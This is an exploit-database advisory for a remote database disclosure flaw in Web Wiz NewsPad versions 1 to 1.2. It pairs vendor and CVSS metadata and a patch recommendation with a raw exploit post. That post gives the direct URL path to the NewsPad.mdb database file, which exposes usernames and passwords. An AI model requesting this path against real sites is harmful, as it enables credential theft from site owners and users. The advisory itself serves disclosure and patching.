Web Wiz NewsPad Remote Database Disclosure Vulnerability

vendor:

Web Wiz NewsPad

by:

ViRuSMaN

8.8

CVSS

HIGH

Remote Database Disclosure

200

CWE

Product Name: Web Wiz NewsPad

Affected Version From: 1

Affected Version To: 1.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:webwizguide:web_wiz_newspad

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Web Wiz NewsPad Remote Database Disclosure Vulnerability

A vulnerability exists in Web Wiz NewsPad, which allows an attacker to remotely access the database file NewsPad.mdb. This can be exploited by sending a request to the vulnerable server for the file NewsPad.mdb, which contains sensitive information such as usernames and passwords.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of Web Wiz NewsPad.

Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
==============================================================================
        [»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ Web Wiz NewsPad ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Web Wiz NewsPad - Free eNewsletter Software Download ]
    [»] Download:           [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/database/NewsPad.mdb

Author: ViRuSMaN <-

###########################################################################